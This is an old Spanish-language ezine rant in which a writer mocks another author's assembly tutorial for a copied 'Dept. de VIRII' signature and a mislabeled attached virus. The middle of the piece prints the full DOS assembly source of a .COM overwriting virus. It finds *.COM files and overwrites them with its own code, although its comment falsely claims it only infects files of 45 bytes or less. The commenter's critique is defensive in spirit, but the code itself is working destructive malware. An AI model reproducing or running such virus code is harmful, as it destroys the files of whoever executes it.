7 S_K (C) NH community 2000 Dept. de VIRII... Como copiar a DaN
[estaba leyendo la DP3, que me parecia mas que buena con respecto a otras que ya aparecieron en AZ y no tenia falta alguna hasta que...]
Daemon's Paradise 3, Articulo 3 en File 3x03.txt.
CURSO DE ASM (1ª entrega)
por S_K - s-k@bigfoot.com
[... a ver a ver ... del articulo en si no voy a opinar, cada quien explica a su forma y a su antojo lo que quiera. Peeeeero al llegar a la firma...]
Un saludo de S_K.
byez aLL
(C) NH community 2000
Dept. de VIRII
[... Dept. de VIRII !!!! ... es muuuuy copiado de Digital Anarchy ... comprendo que lo bueno queda y persiste, pero S_K, se un poco mas original ...]
[no es solo eso, por eso solo no habria de hacer un articulo, se ve que como anexo, metio dos 'virus', que el primero un com overwriter y el segundo un com infector usando appending method, que no estaria mal, sino fuera porque el overwriter, no esta presentado asi]
; Infecta archivos .COM menores o iguales a 45 bytes
;by S_K[dejemos de lado el by S_K, que puede ser que el mismo lo haya hecho, porque es una gilada total, pero lean atentamente, infecta archivos com menores o iguales a 45 bytes... vean el codigo]
comienzo:
mov ah,4eh ;funcion buscar archivo
mov dx,offset tipo ;puntero dirigido a tipobuscarabrir:
int 21h
jc final ;si no encuentra archivo finaliza programa
;(bit de acarreo en 1), si lo encuentra continua (bit de acarreo en 0)
mov ax,3d02 ;funcion abrir archivo
mov dx,9eh ;selecciona los datos DTA del archivo encontrado
int 21h
jc cerrar ;si ya esta infectado cierra archivo (bit de
; acarreo en 1) y busca otro, si no esta infectado (bit de acarreo en 0) continua
xchg bx,ax ;mete los datos del registro AX en BX para
; que no los muestre al final del programa en la ventana del mismo
mov ah,40h ;funcion de copiar codigo
mov cl,longitud ;indica en el registro del contador la
; memoria que ocupa el virus
mov dx,offset comienzo ;puntero indicando desde donde se debe copiar
int 21hcerrar:
mov ah,3eh ;funcion cerrar archivo
int 21h
mov ah,4fh ;funcion buscar otro archivo
jmp buscarabrir ;salta a buscarabrir para iniciar la
; busqueda de un nuevo archivofinal:
int 20h ;sale al dos
tipo db '*.COM',0 ;tipo de ficheros a buscar e infectartheend:
longitud equ offset theend - offset comienzo ;indica la memoria que ocupa el virus[donde chequea la longitud del archivo a infectar??? S_K, lo que hiciste es digno de publicarse aqui, en az, pues si un newbie, que es a quien le dirijes el articulo, compila y ejecuta este file sobreescribira todos los .com en el directorio actual y eso sin saberlo. Fue muy lammer de tu parte, no se que querias lograr con ello, quizas hacerte el muy malito, no se. Espero que recapacites. Y recuerda que solo has hablado en tu articulo de asm, sobre un poco de funciones, y nada mas, osea que ningun newbie que lea eso podra entender lo que escribiste en esos 'viruses' y menos si le dices que solo infectara archivos de 45 bytes como maximo y luego en los comentarios ni siquiera camuflas algo, que seria aun mas lammer, pero al menos tendrias estilo.]
Vaselin; "comprate un tarro porque aca llegue yo"
